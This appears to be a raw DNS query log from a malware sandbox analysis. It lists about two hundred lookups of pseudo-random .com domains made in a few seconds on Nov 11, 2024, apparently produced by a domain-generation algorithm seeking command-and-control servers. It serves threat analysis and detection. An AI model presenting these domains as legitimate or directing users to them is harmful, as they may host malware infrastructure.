                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.708173037 CET192.168.2.61.1.1.10xbe53Standard query (0)qeqyrug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.708362103 CET192.168.2.61.1.1.10x52fdStandard query (0)puzygop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.708457947 CET192.168.2.61.1.1.10x1542Standard query (0)lykynon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.709100008 CET192.168.2.61.1.1.10x1a77Standard query (0)qetytav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.713746071 CET192.168.2.61.1.1.10xf89fStandard query (0)vonykuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.715255976 CET192.168.2.61.1.1.10xf1d3Standard query (0)vopyzot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.716506958 CET192.168.2.61.1.1.10x4cefStandard query (0)gahyvuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.717144012 CET192.168.2.61.1.1.10x8a22Standard query (0)puvyjyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.717900038 CET192.168.2.61.1.1.10xad0aStandard query (0)volygoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.721544981 CET192.168.2.61.1.1.10xda41Standard query (0)gatypas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.721851110 CET192.168.2.61.1.1.10x251fStandard query (0)lykyfud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.723701000 CET192.168.2.61.1.1.10xbfa3Standard query (0)vojybim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.744082928 CET192.168.2.61.1.1.10x9218Standard query (0)qedyxel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.290885925 CET192.168.2.61.1.1.10x5768Standard query (0)qetykyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.292977095 CET192.168.2.61.1.1.10x5d0aStandard query (0)puryjeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.296391010 CET192.168.2.61.1.1.10x7c2dStandard query (0)lyvynid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.340756893 CET192.168.2.61.1.1.10xb741Standard query (0)vopykum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.341058016 CET192.168.2.61.1.1.10xe5e1Standard query (0)vojypat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.356749058 CET192.168.2.61.1.1.10x747Standard query (0)qegytop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.419492960 CET192.168.2.61.1.1.10x707cStandard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.419709921 CET192.168.2.61.1.1.10xdf5cStandard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.150921106 CET192.168.2.61.1.1.10xfcacStandard query (0)gahypoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.189436913 CET192.168.2.61.1.1.10x7befStandard query (0)qedylig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.192823887 CET192.168.2.61.1.1.10x61adStandard query (0)qebyhag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.193953037 CET192.168.2.61.1.1.10x7098Standard query (0)vopyrik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.197180986 CET192.168.2.61.1.1.10x45abStandard query (0)lykyvyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.200634003 CET192.168.2.61.1.1.10x61ddStandard query (0)pupytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.209316015 CET192.168.2.61.1.1.10x86c2Standard query (0)qekyvup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.210484028 CET192.168.2.61.1.1.10xe245Standard query (0)vonyjef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.212903023 CET192.168.2.61.1.1.10xeae6Standard query (0)lysytoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.216310978 CET192.168.2.61.1.1.10x4cddStandard query (0)gatykyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.220201969 CET192.168.2.61.1.1.10x1fd6Standard query (0)lyxyfuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.221019030 CET192.168.2.61.1.1.10xc450Standard query (0)gaqyqez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.222704887 CET192.168.2.61.1.1.10x2059Standard query (0)pufyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.252037048 CET192.168.2.61.1.1.10x57feStandard query (0)vowyqyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.293770075 CET192.168.2.61.1.1.10x160dStandard query (0)lygyxad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.294296026 CET192.168.2.61.1.1.10xd593Standard query (0)gacyfih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.294544935 CET192.168.2.61.1.1.10xb06cStandard query (0)purywyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.294768095 CET192.168.2.61.1.1.10x9429Standard query (0)vocygim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.295202017 CET192.168.2.61.1.1.10xbe35Standard query (0)lyrywur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.298085928 CET192.168.2.61.1.1.10xed43Standard query (0)volydyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.298419952 CET192.168.2.61.1.1.10x9568Standard query (0)lymymax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.298863888 CET192.168.2.61.1.1.10x9b3dStandard query (0)gadyzib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.302171946 CET192.168.2.61.1.1.10x3fd8Standard query (0)puzyduq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.336787939 CET192.168.2.61.1.1.10x61caStandard query (0)qeqyqep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.337078094 CET192.168.2.61.1.1.10x92cbStandard query (0)ganyhab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.337281942 CET192.168.2.61.1.1.10x4c71Standard query (0)vofypam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.337281942 CET192.168.2.61.1.1.10xe67dStandard query (0)lymyjyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.337462902 CET192.168.2.61.1.1.10xcf09Standard query (0)pujycyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.337500095 CET192.168.2.61.1.1.10xdd08Standard query (0)qexyfuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.337609053 CET192.168.2.61.1.1.10xaa11Standard query (0)qetyrul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.337757111 CET192.168.2.61.1.1.10x7ad2Standard query (0)pupylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.337872028 CET192.168.2.61.1.1.10x820dStandard query (0)ganynos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.337991953 CET192.168.2.61.1.1.10x544fStandard query (0)qekysel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.338215113 CET192.168.2.61.1.1.10xc00eStandard query (0)lysylun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.338399887 CET192.168.2.61.1.1.10xd6d8Standard query (0)vonymoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.338766098 CET192.168.2.61.1.1.10x646dStandard query (0)puzybil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.367523909 CET192.168.2.61.1.1.10x8ea6Standard query (0)puvybuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.367693901 CET192.168.2.61.1.1.10xbb57Standard query (0)galydyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.367863894 CET192.168.2.61.1.1.10x2498Standard query (0)gatyruw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.367985010 CET192.168.2.61.1.1.10x8b1dStandard query (0)vojycec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.368139029 CET192.168.2.61.1.1.10xd29Standard query (0)gadypah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.368266106 CET192.168.2.61.1.1.10x99a8Standard query (0)volybut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.368680000 CET192.168.2.61.1.1.10x3d38Standard query (0)pumyjev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.368825912 CET192.168.2.61.1.1.10xaaeStandard query (0)qedytoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.369206905 CET192.168.2.61.1.1.10x7b7cStandard query (0)galyvuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.369342089 CET192.168.2.61.1.1.10xb14aStandard query (0)gahyces.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.370728970 CET192.168.2.61.1.1.10x65afStandard query (0)lyvygon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.370920897 CET192.168.2.61.1.1.10x4272Standard query (0)lyryjej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.371071100 CET192.168.2.61.1.1.10xcc61Standard query (0)lykyser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.371212959 CET192.168.2.61.1.1.10xa30eStandard query (0)vocybuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.371352911 CET192.168.2.61.1.1.10x2e9bStandard query (0)pujypal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.371505022 CET192.168.2.61.1.1.10xe64dStandard query (0)qebyniv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.371644974 CET192.168.2.61.1.1.10x9856Standard query (0)lyxynir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.373328924 CET192.168.2.61.1.1.10x1f57Standard query (0)puvygog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.373565912 CET192.168.2.61.1.1.10x2d4Standard query (0)pumymap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.373729944 CET192.168.2.61.1.1.10x892aStandard query (0)qeqykyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.410829067 CET192.168.2.61.1.1.10xd61eStandard query (0)qegyxav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.515979052 CET192.168.2.61.1.1.10x8c85Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.538573980 CET192.168.2.61.1.1.10x68d2Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.542614937 CET192.168.2.61.1.1.10x1ffaStandard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.544220924 CET192.168.2.61.1.1.10x8895Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.547856092 CET192.168.2.61.1.1.10x4395Standard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.547916889 CET192.168.2.61.1.1.10xf845Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.550636053 CET192.168.2.61.1.1.10x56a6Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.557221889 CET192.168.2.61.1.1.10x5818Standard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.799226046 CET192.168.2.61.1.1.10xbe23Standard query (0)vofyzof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.947202921 CET192.168.2.61.1.1.10xeb12Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.947834015 CET192.168.2.61.1.1.10x57ecStandard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.948301077 CET192.168.2.61.1.1.10x98fStandard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:18.278886080 CET192.168.2.61.1.1.10x14e9Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:18.288707972 CET192.168.2.61.1.1.10x84b8Standard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:18.716356039 CET192.168.2.61.1.1.10xb3bfStandard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.018986940 CET192.168.2.61.1.1.10x20eStandard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.129075050 CET192.168.2.61.1.1.10x5dc9Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.179208994 CET192.168.2.61.1.1.10xdb27Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.185204029 CET192.168.2.61.1.1.10xbd8bStandard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.188143015 CET192.168.2.61.1.1.10xcdbdStandard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.218338013 CET192.168.2.61.1.1.10x9fd4Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.220840931 CET192.168.2.61.1.1.10x101eStandard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.224169016 CET192.168.2.61.1.1.10x1c9aStandard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.224425077 CET192.168.2.61.1.1.10x226bStandard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.243700981 CET192.168.2.61.1.1.10x9f39Standard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.278652906 CET192.168.2.61.1.1.10x5c82Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.279839993 CET192.168.2.61.1.1.10xd205Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.281217098 CET192.168.2.61.1.1.10xe0a3Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.282478094 CET192.168.2.61.1.1.10xe3eeStandard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.283701897 CET192.168.2.61.1.1.10xa3b9Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.287636042 CET192.168.2.61.1.1.10x75d1Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.289406061 CET192.168.2.61.1.1.10xcfd8Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.290715933 CET192.168.2.61.1.1.10x8754Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.767069101 CET192.168.2.61.1.1.10x4bafStandard query (0)gacyvub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.767160892 CET192.168.2.61.1.1.10xf2bfStandard query (0)vonygit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.767482042 CET192.168.2.61.1.1.10x9996Standard query (0)pumygil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.767868996 CET192.168.2.61.1.1.10xf8b5Standard query (0)lysywyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.768801928 CET192.168.2.61.1.1.10xdd89Standard query (0)qedyruv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.768906116 CET192.168.2.61.1.1.10x2b58Standard query (0)gadyrus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.769179106 CET192.168.2.61.1.1.10x4ad3Standard query (0)volycem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.769345045 CET192.168.2.61.1.1.10xe3c0Standard query (0)lymygor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.769623995 CET192.168.2.61.1.1.10x296cStandard query (0)puzyceg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.769812107 CET192.168.2.61.1.1.10x8414Standard query (0)qeqyhol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.770323992 CET192.168.2.61.1.1.10xaeeeStandard query (0)vofyruc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.770591974 CET192.168.2.61.1.1.10xe15cStandard query (0)lyxyvyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.770853043 CET192.168.2.61.1.1.10xb4c3Standard query (0)gaqyhaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.771130085 CET192.168.2.61.1.1.10xc589Standard query (0)qexyvyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.771368027 CET192.168.2.61.1.1.10x70e6Standard query (0)pufytip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.771675110 CET192.168.2.61.1.1.10x6ce5Standard query (0)vowyjak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.771861076 CET192.168.2.61.1.1.10x6514Standard query (0)lygytix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.772047997 CET192.168.2.61.1.1.10xa6adStandard query (0)qekyxaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.786385059 CET192.168.2.61.1.1.10x26e9Standard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.787600994 CET192.168.2.61.1.1.10xc128Standard query (0)gacydes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.787798882 CET192.168.2.61.1.1.10x1fe2Standard query (0)galycah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.787843943 CET192.168.2.61.1.1.10xa41cStandard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.787997961 CET192.168.2.61.1.1.10x96d3Standard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.788017035 CET192.168.2.61.1.1.10x99b4Standard query (0)gaqynih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.788193941 CET192.168.2.61.1.1.10x44b8Standard query (0)lymynuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.792309046 CET192.168.2.61.1.1.10x7f6aStandard query (0)lyryman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.793225050 CET192.168.2.61.1.1.10x4a67Standard query (0)vojyzik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.793586969 CET192.168.2.61.1.1.10x92eaStandard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.827876091 CET192.168.2.61.1.1.10x954bStandard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.828193903 CET192.168.2.61.1.1.10xccd5Standard query (0)lysyjex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.828193903 CET192.168.2.61.1.1.10x7f26Standard query (0)vowymom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.828399897 CET192.168.2.61.1.1.10x4031Standard query (0)puzypav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.828533888 CET192.168.2.61.1.1.10x39bfStandard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.829437017 CET192.168.2.61.1.1.10xe2aeStandard query (0)vofykyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.829487085 CET192.168.2.61.1.1.10x6930Standard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.829674006 CET192.168.2.61.1.1.10x8d28Standard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.830034971 CET192.168.2.61.1.1.10x2288Standard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.880908012 CET192.168.2.61.1.1.10x193Standard query (0)lykyxoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.948878050 CET192.168.2.61.1.1.10xec15Standard query (0)puvydyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.004805088 CET192.168.2.61.1.1.10x746eStandard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.011324883 CET192.168.2.61.1.1.10x62a1Standard query (0)volypof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.015002012 CET192.168.2.61.1.1.10x3605Standard query (0)gadykyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.026611090 CET192.168.2.61.1.1.10x22f3Standard query (0)purymog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.027137995 CET192.168.2.61.1.1.10xbec2Standard query (0)vocydyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.044784069 CET192.168.2.61.1.1.10x64caStandard query (0)gatyqeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.227752924 CET192.168.2.61.1.1.10xaebbStandard query (0)pufylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.228034019 CET192.168.2.61.1.1.10x9429Standard query (0)qetyhov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.228508949 CET192.168.2.61.1.1.10x6702Standard query (0)gahyziw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.228526115 CET192.168.2.61.1.1.10x1f4fStandard query (0)qetyqag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.235501051 CET192.168.2.61.1.1.10xe030Standard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.235717058 CET192.168.2.61.1.1.10x75f8Standard query (0)vopyqef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.235899925 CET192.168.2.61.1.1.10x655bStandard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.236088037 CET192.168.2.61.1.1.10x1d19Standard query (0)qeqyniq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.236335993 CET192.168.2.61.1.1.10x8230Standard query (0)pujyxoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.236480951 CET192.168.2.61.1.1.10x5e2cStandard query (0)qegylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.236610889 CET192.168.2.61.1.1.10x9910Standard query (0)qebyfup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.426606894 CET192.168.2.61.1.1.10x30d7Standard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.430234909 CET192.168.2.61.1.1.10x8117Standard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.440694094 CET192.168.2.61.1.1.10xafe5Standard query (0)pumybuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.440887928 CET192.168.2.61.1.1.10xb5ccStandard query (0)ganyfuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.441049099 CET192.168.2.61.1.1.10x640eStandard query (0)lygylur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.441344976 CET192.168.2.61.1.1.10x26eeStandard query (0)galypob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.441344976 CET192.168.2.61.1.1.10x9cc9Standard query (0)lyxysad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.441615105 CET192.168.2.61.1.1.10x373dStandard query (0)pupywyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.844223022 CET192.168.2.61.1.1.10xe801Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.844892979 CET192.168.2.61.1.1.10x97cdStandard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.845772028 CET192.168.2.61.1.1.10xbf0eStandard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.849484921 CET192.168.2.61.1.1.10x4ea4Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.849612951 CET192.168.2.61.1.1.10x70e9Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.850372076 CET192.168.2.61.1.1.10x137Standard query (0)qexyryl.comA (IP address)IN (0x0001)false
